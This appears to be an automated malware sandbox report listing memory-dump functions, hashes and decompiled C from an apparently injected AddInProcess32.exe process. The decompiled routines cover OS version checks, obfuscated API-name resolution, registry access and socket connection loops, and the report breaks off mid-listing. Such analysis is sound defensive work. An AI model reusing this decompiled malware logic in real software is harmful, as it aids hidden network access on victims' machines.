Instruction Fuzzy Hash: 44F02076700100AFD3008A89DC95BEBBBADEFC8630F14803BE208D7360CA70EC0187A8

Uniqueness

Uniqueness Score: -1.00%

Function 054B20CC, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3534d08e6a8736790ae153f086396434ad77d1d5c9929c29a0ca7d0232529034
Instruction ID: ebbf328698d14de5e904e5d76823edfc074587b55b2457655118fec7107cb00b
Opcode Fuzzy Hash: 3534d08e6a8736790ae153f086396434ad77d1d5c9929c29a0ca7d0232529034
Instruction Fuzzy Hash: BBF0826B80D2C15FDB03A7384C784D57FA1FE6324074A49DBD291CB473E695990BD322

Uniqueness

Uniqueness Score: -1.00%

Function 054BFBA0, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d36f39cd4e7bcaeff90a4828fd7f6606f90f54acd711cf5b846b4c524bcb3b33
Instruction ID: e5be13a811b1463700ea6c5df975edad3ead1436b8920f7a39f8d6c6207acd11
Opcode Fuzzy Hash: d36f39cd4e7bcaeff90a4828fd7f6606f90f54acd711cf5b846b4c524bcb3b33
Instruction Fuzzy Hash: C8F0F63090D288ABCB55DBA8C5952CD7FB0EF42314F3481DEC46597342DB314A468751

Uniqueness

Uniqueness Score: -1.00%

Function 054B5E10, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed56fef4240bd99e37b8bb94cc2b761ab047da76c36eb3366229c815ddb9a84
Instruction ID: 87a44670f0856b1c18d567e6a570974b418fd1d7c34404396b7c466fe3fd0cd3
Opcode Fuzzy Hash: 2ed56fef4240bd99e37b8bb94cc2b761ab047da76c36eb3366229c815ddb9a84
Instruction Fuzzy Hash: C5E039767001286F9304DAAED888D6BBBEEEBCD674351817AF50CC7311DA309C0086B0

Uniqueness

Uniqueness Score: -1.00%

Function 054B8060, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2d524bc44d3c151fc9e9829f235faaabc207bb49d1961f0eaea625416b8dd73
Instruction ID: 9b9f9f3d6554f9420570b4c2704debb682082c3ede19a3f7ff68684d3c7039d2
Opcode Fuzzy Hash: d2d524bc44d3c151fc9e9829f235faaabc207bb49d1961f0eaea625416b8dd73
Instruction Fuzzy Hash: 17E065317002145FD3049A5EDC44E6BFBEDEFC9660B10407AF608D7361CA70EC0086A4

Uniqueness

Uniqueness Score: -1.00%

Function 054B809F, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8528ba62e2d559c0be51f16f781f13e9260aa33375983d6cfff76e7c4172e5f5
Instruction ID: ed8d1e2f584dc84b397f8503f86f1f1178629f1912cf08b3a03df25e72b63ea8
Opcode Fuzzy Hash: 8528ba62e2d559c0be51f16f781f13e9260aa33375983d6cfff76e7c4172e5f5
Instruction Fuzzy Hash: C2E0927A7052006FC300961BDC88ECAFFADEFC967075580ABF509C7722DA61AC018AB4

Uniqueness

Uniqueness Score: -1.00%

Function 054BBC88, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b6a1069a55594423b5fbaca2e5e738b8e8b5889812a50e29df3f95b37fed4a
Instruction ID: c90c98f2a14b92aa4fcd31fad179d85f80d1387b830c2902343b27344951944f
Opcode Fuzzy Hash: f1b6a1069a55594423b5fbaca2e5e738b8e8b5889812a50e29df3f95b37fed4a
Instruction Fuzzy Hash: EFE0ED34E09308ABCB24AFB0A8057CCBF30EB82304F1080DE98003A390C67016118B95

Uniqueness

Uniqueness Score: -1.00%

Function 054B7340, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121ca023cc2d25f2984fab2380271ac63216bcaa56972194fe218a6d72e069e6
Instruction ID: 6a48991bd2592026ec28af20b54857bd6a345243c746a71fe9920f0bb8da7e3a
Opcode Fuzzy Hash: 121ca023cc2d25f2984fab2380271ac63216bcaa56972194fe218a6d72e069e6
Instruction Fuzzy Hash: 47E0CD3231411427EA08565AA415FEBF74DDFC8721F49513BF909CA650D966580292F0

Uniqueness

Uniqueness Score: -1.00%

Function 054B2080, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df9d8a23c2ab0e6d28e75b01ae39d73869e5e7099c1e611fc2b0737a2a83c0d
Instruction ID: 51626291755521c2653c753d33783e405e82f9889d1f3b11efe3ee06e9cee58e
Opcode Fuzzy Hash: 4df9d8a23c2ab0e6d28e75b01ae39d73869e5e7099c1e611fc2b0737a2a83c0d
Instruction Fuzzy Hash: 8CE0D83640D2C05ECB07B7384C748C93F72AF13204B0789DBD2848B422E95549099776

Uniqueness

Uniqueness Score: -1.00%

Function 054B80B0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d129cc683658a560ca6de1b8606b22a136c69c6866090692d6affa7c41dde842
Instruction ID: d7857fa7eec5f2a775f73228604ecc54c151508d6f4b9fdec9b358eb0dd03239
Opcode Fuzzy Hash: d129cc683658a560ca6de1b8606b22a136c69c6866090692d6affa7c41dde842
Instruction Fuzzy Hash: 49E08C363001006FC3148A0EEC88D4BFBADEFC8630B10806AFA09C7320CA70AC01CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 054BFBB0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c6243c2298a2bbdd43686efd3864cafc416d41314eda318ed81aea33fa545f
Instruction ID: 15188b25a4703b6398e29fc9aa9ca817da7fc32a86a06bed9f0139a9ec5785db
Opcode Fuzzy Hash: 74c6243c2298a2bbdd43686efd3864cafc416d41314eda318ed81aea33fa545f
Instruction Fuzzy Hash: 4AE0C270E0520CAFCB84EFA8D45578EBBF5EB89204F20C1AAD418A3340E6759A458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 054BFA58, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 339cfabeb7fededda87a4d58cfc3d0c58a9ce411545377ac688f900614785522
Instruction ID: 2585490dbc066571034195d75e6ead80f255f8faab87db2a048091f42b437ac9
Opcode Fuzzy Hash: 339cfabeb7fededda87a4d58cfc3d0c58a9ce411545377ac688f900614785522
Instruction Fuzzy Hash: 91E0AE74D05208EFCB48DFA8D445A9DBFB5FB89305F1081AAE848A3300DB36AA55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 054BE009, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f502d108f96885988c2844095518feb26df98e09c056a76b108a821cc60196
Instruction ID: 5a365ff157290ad957691ee7f27c247641246074120f55c31fe54de901f7865a
Opcode Fuzzy Hash: 79f502d108f96885988c2844095518feb26df98e09c056a76b108a821cc60196
Instruction Fuzzy Hash: D8E04F790697C44FCB9607A4ED5E0D87F30EE8221134900CBE859C9872CE204888CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 054B56AE, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e4cf312c58c75772ff023b0dc0983a6c020f3de7d690ee7f848ad78c9ad95b
Instruction ID: 876eb76a83b77318120a46dd6aacf01f949bf0c2df61ebc34d77d07d750345d5
Opcode Fuzzy Hash: 11e4cf312c58c75772ff023b0dc0983a6c020f3de7d690ee7f848ad78c9ad95b
Instruction Fuzzy Hash: 10E08630D05108EFCB00FFB5E94189DB7B5FB85214B104A94D90C97344DB356F059B71

Uniqueness

Uniqueness Score: -1.00%

Function 054B56B0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b7d67cb3f7e21de733ab361402189bfbad4e959987691c7bcba33b80cb3c88
Instruction ID: 4e2f04b0c80c580245f58079f1e88d32026a3affe72bb819d8f8c4b442c733f0
Opcode Fuzzy Hash: 89b7d67cb3f7e21de733ab361402189bfbad4e959987691c7bcba33b80cb3c88
Instruction Fuzzy Hash: D9E08630D05108EFC700FFB5E94185DB7B5FB852147104A94D90C97344DB356F059B71

Uniqueness

Uniqueness Score: -1.00%

Function 054BE018, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b048ea8a7a8066e44a9fe251d4ead4cdc27e3b3dc1dbd4333ad27bf4c5c0951
Instruction ID: 694e447d1e843540e62eb603ffa6d03ac1478851b0bdc30e38969d8223a0a299
Opcode Fuzzy Hash: 1b048ea8a7a8066e44a9fe251d4ead4cdc27e3b3dc1dbd4333ad27bf4c5c0951
Instruction Fuzzy Hash: 3ED0C9304346088BC7CC2BA4F90F2E93F68FBC164BB4445A9F80AC0930DFB15850CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 054B2650, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7012f99e513eb5324413d5b8cd8ab9f3c9103147124c7154afcd883e25d936c1
Instruction ID: 115ef2c8c9e5901c29739db92042ccb3722d68fbfae7c52d20ec75753679679c
Opcode Fuzzy Hash: 7012f99e513eb5324413d5b8cd8ab9f3c9103147124c7154afcd883e25d936c1
Instruction Fuzzy Hash: 93C08C3B0000006BEF08A750CE04FCD77D0FBD63C0F06C99659008E821C228CB5BAB20

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: AddInProcess32.exe PID: 4656 Parent PID: 3180 AddInProcess32.exeCOMMON

Executed Functions

Function 004132E6, Relevance: 2.6, Strings: 2, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004132E6(void* __ecx, void* __edx) {
				char _v26;
				short _v28;
				intOrPtr _v164;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v208;
				char _v212;
				short _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v240;
				char _v244;
				void* _t46;
				void* _t48;
				intOrPtr* _t51;
				intOrPtr _t57;
				void* _t72;
				char _t75;
				char* _t77;
				void* _t78;
				void* _t79;
				intOrPtr _t81;
				void* _t83;
				char* _t84;
				intOrPtr* _t85;

				_t79 = __edx;
				_t78 = __ecx;
				_t85 =  &_v228;
				_t75 =  &_v168;
				_v228 = 0x9c;
				_v232 = 0;
				_v212 = 0;
				_v208 = 0;
				 *_t85 = _t75;
				_t46 = E004129E4();
				 *_t85 = _t75;
				_v168 = 0x9c;
				L0041F57C();
				_t83 = _t46;
				if(_t46 == 0) {
					_v240 = _t75;
					_v172 = 0x94;
					L0041F57C();
					_push(_t75);
					if(_t46 != 0) {
						L29:
						return 0;
					}
				}
				_t48 = E004081AA("Ed5LC542dMZ65dlXR8W");
				_t51 = E00407F8E(_t79, E00407F7A(_t79, E004081AA("wd0RdiNh.Sii")), _t48);
				if(_t51 == 0) {
					_v244 =  &_v212; // executed
					L0041F594(); // executed
				} else {
					_v244 =  &_v212;
					 *_t51();
				}
				_push(_t78);
				if(_t83 == 0 || _v164 != 2) {
					goto L29;
				}
				if(_v176 != 5) {
					L15:
					_t84 =  &_v220;
					_t77 =  &_v224;
					_v244 = _t84;
					 *_t85 = _t77;
					if(E0041328F() == 0 || _v224 != 6) {
						L25:
						_v244 = _t84;
						 *_t85 = _t77;
						if(E0041328F() == 0 || _v224 != 0xa || _v220 != 0) {
							goto L29;
						} else {
							return (0 | _v26 != 0x00000001) + (0 | _v26 != 0x00000001) + 0xd;
						}
					} else {
						_t57 = _v220;
						if(_t57 != 0) {
							if(_t57 != 1) {
								if(_t57 != 2) {
									if(_t57 != 3) {
										goto L25;
									}
									return (0 | _v26 != 0x00000001) + 0xb + (0 | _v26 != 0x00000001) * 2;
								}
								return (0 | _v26 != 0x00000001) + (0 | _v26 != 0x00000001) + 0xa;
							}
							return (0 | _v26 != 0x00000001) + 8;
						}
						return ((0 | _v26 == 0x00000001) - 0x00000001 & 0xfffffa07) + 0x600;
					}
				}
				_t81 = _v172;
				_t72 = 0x501;
				if(_t81 != 1) {
					if(_t81 != 2) {
						goto L15;
					}
					_t72 = 3;
					if(_v28 != 0x8000) {
						if(_v26 != 1) {
							L14:
							 *_t85 = 0x59;
							L0041F87C();
							_push(_t81);
							asm("sbb eax, eax");
							return _t72 + 5;
						}
						_t72 = 2;
						if(_v216 != 9) {
							goto L14;
						}
					}
				}
				return _t72;
			}

0x004132e6
0x004132e6
0x004132e8
0x004132ee
0x004132f2
0x004132fa
0x00413302
0x0041330a
0x00413312
0x00413315
0x0041331a
0x0041331d
0x00413325
0x0041332d
0x0041332f
0x0041336e
0x00413371
0x00413379
0x00413380
0x00413381
0x004134c6
0x00000000
0x004134c6
0x00413387
0x00413338
0x0041335a
0x00413365
0x00413389
0x0041338c
0x00413367
0x00413367
0x0041336a
0x0041336a
0x00413393
0x00413394
0x00000000
0x00000000
0x004133aa
0x0041340d
0x0041340d
0x00413411
0x00413415
0x00413419
0x00413423
0x00413495
0x00413495
0x00413499
0x004134a3
0x00000000
0x004134b3
0x00000000
0x004134c0
0x0041342c
0x0041342c
0x00413432
0x00413451
0x00413468
0x00413480
0x00000000
0x00000000
0x00000000
0x0041348f
0x00000000
0x00413477
0x00000000
0x00413460
0x00000000
0x00413447
0x00413423
0x004133ac
0x004133b0
0x004133b8
0x004133c1
0x00000000
0x00000000
0x004133cd
0x004133d2
0x004133e0
0x004133f3
0x004133f3
0x004133fa
0x00413402
0x00413403
0x00000000
0x00413405
0x004133e8
0x004133ed
0x00000000
0x00000000
0x004133ed
0x004133d2
0x004134d0

Strings

wd0RdiNh.Sii, xrefs: 0041333D
Ed5LC542dMZ65dlXR8W, xrefs: 00413331

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Ed5LC542dMZ65dlXR8W$wd0RdiNh.Sii
API String ID: 0-2370874720
Opcode ID: 46006a64fbda4bf4b3e9b0ffcf7154b995a5e1936410bb6f002cd3adb6ade318
Instruction ID: aea862b3450ebf307a16053a8a3fc20b1df094ade6bc7c343729d6a33193dea1
Opcode Fuzzy Hash: 46006a64fbda4bf4b3e9b0ffcf7154b995a5e1936410bb6f002cd3adb6ade318
Instruction Fuzzy Hash: D7418E7040C7419AEB21AF21C5457AFBAE0AF81759F148E2FE4C487281D37D8AC98B5B

Uniqueness

Uniqueness Score: -1.00%

Function 004130E8, Relevance: 2.5, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

@, xrefs: 0041312D
Unknown, xrefs: 00413162

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$Unknown
API String ID: 0-3125819936
Opcode ID: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
Instruction ID: 75a62b7ad59212d7e7d3757252a2119b8f15ada3fb68da9ed8f134ad780259a0
Opcode Fuzzy Hash: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
Instruction Fuzzy Hash: 830108B0409341AED320AF26D94479BFBE4BBD4714F008A1EE49847290D37985498B97

Uniqueness

Uniqueness Score: -1.00%

Function 00405FBE, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
Instruction ID: 50f9dbed06e6853259d32925d3d8c4084038ba02febeb7ff5867e9cbce9530da
Opcode Fuzzy Hash: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
Instruction Fuzzy Hash: 1DF0F9B49087458BD300FF3DC44521ABAE1BF88328F558A3EE499E3395E63CC5558E07

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7D, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

-, xrefs: 00405DB7

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
Instruction ID: 542a74277ee6daf56934a715b94c3cb6415021c893f49c4910618d7e1c795e3b
Opcode Fuzzy Hash: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
Instruction Fuzzy Hash: 8B416E70608B008FC720EF69D48461BBBE4EF85324F518A3FE994A73D1C77899458F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410608, Relevance: 1.3, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00410608(signed int __ecx, char _a4, intOrPtr _a8) {
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t41;
				intOrPtr* _t43;

				_t35 = 0;
				_v44 = 0;
				_v52 = 0;
				_v56 = 0xf003f;
				_v60 = 0;
				_v48 =  &_v16;
				_v64 = 0;
				_v68 = 0;
				_v72 = _a8;
				_t27 = _a4;
				_v76 = _t27; // executed
				L0041F454(); // executed
				_t43 = _t41 - 0x20;
				if(_t27 == 0) {
					asm("repne scasb");
					_v104 = 0;
					_v96 = _v16;
					_v92 =  !(__ecx | 0xffffffff) - 1;
					_v100 = _v20;
					_v108 = _v24;
					_t33 = _v52;
					 *_t43 = _t33; // executed
					L0041F41C(); // executed
					_t43 = _t43 - 0x18;
					_t34 = _v76;
					_t35 = 0 | _t33 == 0x00000000;
					 *_t43 = _t34; // executed
					L0041F45C(); // executed
					_push(_t34);
				}
				return _t35;
			}

0x0041060a
0x00410613
0x0041061b
0x00410623
0x0041062b
0x00410633
0x0041063b
0x00410643
0x0041064b
0x0041064f
0x00410653
0x00410656
0x0041065b
0x00410660
0x0041066b
0x00410671
0x0041067c
0x00410684
0x00410688
0x00410690
0x00410694
0x00410698
0x0041069b
0x004106a0
0x004106a5
0x004106a9
0x004106ac
0x004106af
0x004106b4
0x004106b4
0x004106bc

Strings

?, xrefs: 00410623

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
Instruction ID: d7b5c200bfe116dfd6f132702afe2373019979046eeb2612c7d3539b4a1fd506
Opcode Fuzzy Hash: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
Instruction Fuzzy Hash: 6111B0B45083419FD340EF69D59475BFBE0BB88354F40892EF89883351E7B9D5898F86

Uniqueness

Uniqueness Score: -1.00%

Function 0041328F, Relevance: 1.3, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041328F() {
				intOrPtr* _v4;
				intOrPtr* _v8;
				char _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _t10;
				intOrPtr _t12;
				void* _t15;
				intOrPtr* _t18;
				intOrPtr* _t19;

				_t10 =  &_v16;
				_v40 = 0x66;
				 *_t18 = 0;
				_v16 = 0;
				_v36 = _t10;
				L0041F69C(); // executed
				_t15 = 0;
				_t19 = _t18 - 0xc;
				if(_t10 == 0) {
					_t12 = _v28;
					 *_v4 =  *((intOrPtr*)(_t12 + 0x10));
					 *_v8 =  *((intOrPtr*)(_t12 + 0xc));
					 *_t19 = _t12;
					L0041F6A4();
					_push(_t12);
					_t15 = 1;
				}
				return _t15;
			}

0x00413292
0x00413296
0x0041329e
0x004132a5
0x004132ad
0x004132b1
0x004132b6
0x004132b8
0x004132bd
0x004132bf
0x004132ca
0x004132d3
0x004132d5
0x004132d8
0x004132dd
0x004132de
0x004132de
0x004132e5

Strings

f, xrefs: 00413296

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
Instruction ID: bf6d1e5e530aa92c88c9cb547170410969f3c4ca1d96cbd027a6ecb1b54c6bd2
Opcode Fuzzy Hash: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
Instruction Fuzzy Hash: 19F0F8B45083018FC704EF25C185B5BBBE1BF88304F40886DE88487354D379D58ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 004059D3, Relevance: .2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E004059D3(signed int __ecx, signed int _a4, signed int _a8) {
				char _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				void* __ebp;
				signed int _t57;
				intOrPtr _t61;
				signed int _t63;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t77;
				intOrPtr _t83;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				char* _t93;
				char* _t94;
				char* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int* _t100;
				void* _t101;
				intOrPtr* _t102;

				_t88 = __ecx;
				_t100 =  &_v60;
				_t87 = _a4;
				_t97 = _a8;
				_v48 = 0xffffffff;
				if(E00408E53() != 4) {
					if(E00408E53() != 2) {
						_t93 =  &_v44;
						_v72 = _t97;
						 *_t100 = _t87;
						_v68 = _t93;
						_t57 = E004051B5(__ecx, _t90);
						if(_t57 != 0) {
							_v68 = 6;
							_v72 = 1;
							 *_t100 = 2; // executed
							L0041F8E4(); // executed
							_t101 = _t100 - 0xc;
							_v60 = _t57;
							if(_t57 == 0xffffffff) {
								goto L28;
							}
							_v80 = 0x10;
							_v84 = _t93;
							_v88 = _t57; // executed
							L0041F93C(); // executed
							_t102 = _t101 - 0xc;
							if(_t57 != 0) {
								L12:
								 *_t102 =  &_v72;
								_t57 = E00405999(_t90);
								goto L28;
							}
							L31:
							return _v72;
						}
						L28:
						return _t57 | 0xffffffff;
					}
					if( *0x42b300 == 0) {
						 *0x42b300 =  *0x42b304;
					}
					_t94 =  &_v44;
					_t98 =  &_v48;
					while(1) {
						_t61 =  *0x42b300;
						if(_t61 == 0) {
							goto L31;
						}
						_v68 = _t94;
						_t91 =  *((intOrPtr*)(_t61 + 0x44));
						 *_t100 = _t61 + 4;
						_v72 =  *((intOrPtr*)(_t61 + 0x44));
						_t63 = E004051B5(_t88,  *((intOrPtr*)(_t61 + 0x44)));
						if(_t63 == 0) {
							L26:
							 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
							continue;
						}
						_v68 = 0;
						_v72 = 1;
						 *_t100 = 2;
						L0041F8E4();
						_v80 = 0x10;
						_v84 = _t94;
						_v88 = _t63;
						_v60 = _t63;
						L0041F93C();
						_t100 = _t100;
						if(_t63 == 0) {
							_v88 = _t97;
							_v92 = _t87;
							_v96 =  *0x42b300;
							 *_t100 = _v72;
							if(E004058E9(_t98) == 0) {
								goto L23;
							}
							goto L31;
						}
						L23:
						 *_t100 = _t98;
						E00405999(_t91);
						goto L26;
					}
					goto L31;
				}
				if( *0x42b300 == 0) {
					 *0x42b300 =  *0x42b304;
				}
				_t95 =  &_v44;
				_t99 =  &_v48;
				while(1) {
					_t71 =  *0x42b300;
					if(_t71 == 0) {
						goto L31;
					}
					_v68 = _t95;
					_t92 =  *((intOrPtr*)(_t71 + 0x44));
					 *_t100 = _t71 + 4;
					_v72 =  *((intOrPtr*)(_t71 + 0x44));
					_t73 = E004051B5(_t88,  *((intOrPtr*)(_t71 + 0x44)));
					if(_t73 == 0) {
						L15:
						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
						continue;
					}
					_v68 = 0;
					_v72 = 1;
					 *_t100 = 2;
					L0041F8E4();
					_v80 = 0x10;
					_v84 = _t95;
					_v88 = _t73;
					_v60 = _t73;
					L0041F93C();
					_t100 = _t100;
					if(_t73 != 0) {
						L14:
						 *_t100 = _t99;
						E00405999(_t92);
						goto L15;
					}
					_t92 =  *0x42b300;
					_t77 =  *((intOrPtr*)(_t92 + 0x88));
					_t88 =  *((intOrPtr*)(_t77 + 0x44));
					_v96 = _t92;
					_v92 = _t77 + 4;
					_v88 =  *((intOrPtr*)(_t77 + 0x44));
					 *_t100 = _v72;
					if(E004058E9(_t99) == 0) {
						goto L14;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
						_t90 =  *0x42b300;
						if(_t90 == 0) {
							goto L31;
						}
						_t83 =  *((intOrPtr*)(_t90 + 0x88));
						_t89 = _v72;
						if(_t83 == 0) {
							_v88 = _t97;
							_v92 = _t87;
						} else {
							_v92 = _t83 + 4;
							_v88 =  *(_t83 + 0x44);
						}
						_v96 = _t90;
						 *_t100 = _t89;
						if(E004058E9(_t99) != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L31;
				}
				goto L31;
			}

0x004059d3
0x004059d7
0x004059da
0x004059de
0x004059e2
0x004059f2
0x00405b38
0x00405c00
0x00405c04
0x00405c08
0x00405c0b
0x00405c0f
0x00405c16
0x00405c1d
0x00405c25
0x00405c2d
0x00405c34
0x00405c39
0x00405c3f
0x00405c43
0x00000000
0x00000000
0x00405c45
0x00405c4d
0x00405c51
0x00405c54
0x00405c59
0x00405c5e
0x00405af8
0x00405afc
0x00405aff
0x00000000
0x00405aff
0x00405c64
0x00000000
0x00405c64
0x00405c18
0x00000000
0x00405c18
0x00405b45
0x00405b4c
0x00405b4c
0x00405b51
0x00405b55
0x00405b59
0x00405b59
0x00405b60
0x00000000
0x00000000
0x00405b66
0x00405b6a
0x00405b70
0x00405b73
0x00405b77
0x00405b7e
0x00405beb
0x00405bf6
0x00000000
0x00405bf6
0x00405b80
0x00405b88
0x00405b90
0x00405b97
0x00405b9f
0x00405ba7
0x00405bab
0x00405bae
0x00405bb2
0x00405bb7
0x00405bbc
0x00405bcd
0x00405bd1
0x00405bd5
0x00405bdd
0x00405be7
0x00000000
0x00000000
0x00000000
0x00405be9
0x00405bbe
0x00405bbe
0x00405bc1
0x00000000
0x00405bc1
0x00000000
0x00405b59
0x004059ff
0x00405a06
0x00405a06
0x00405a0b
0x00405a0f
0x00405a13
0x00405a13
0x00405a1a
0x00000000
0x00000000
0x00405a20
0x00405a24
0x00405a2a
0x00405a2d
0x00405a31
0x00405a38
0x00405b1b
0x00405b26
0x00000000
0x00405b26
0x00405a3e
0x00405a46
0x00405a4e
0x00405a55
0x00405a5d
0x00405a65
0x00405a69
0x00405a6c
0x00405a70
0x00405a75
0x00405a7a
0x00405b13
0x00405b13
0x00405b16
0x00000000
0x00405b16
0x00405a80
0x00405a86
0x00405a8c
